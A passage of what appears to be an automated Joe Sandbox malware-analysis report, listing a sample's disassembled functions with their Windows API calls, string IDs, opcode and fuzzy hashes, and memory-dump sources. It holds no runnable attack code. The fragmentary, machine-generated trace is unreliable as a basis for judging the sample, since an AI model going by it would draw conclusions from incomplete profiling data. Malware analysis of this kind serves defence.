                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045CBCC Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1153243558-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00455127
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                                                                                                                                                                                                                                                                                                                • DrawMenuBar.USER32 ref: 00455207
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1663942905-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1481289235-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$IconImageList_$CreateExtractReplace
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2632138820-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00433BAC Relevance: 22.6, APIs: 15, Instructions: 79COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CursorLoad
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3238433803-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00460ABB Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00460B00
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00460B9E
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00460CE6
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00460D21
                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 00460D40
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000), ref: 00460D47
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s%u
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1899580136-679674701
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047D5F6 Relevance: 21.2, APIs: 4, Strings: 8, Instructions: 210COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0047D6D3
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromCLSID.OLE32(?,?), ref: 0047D6B5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromIID.OLE32(?,?), ref: 0047D7F0
                                                                                                                                                                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 0047D80A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FreeFromStringTask_wcslen$_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2485709727-934586222
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045DB3E Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3381189665-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434506 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00434585
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0043459B
                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004345A9
                                                                                                                                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
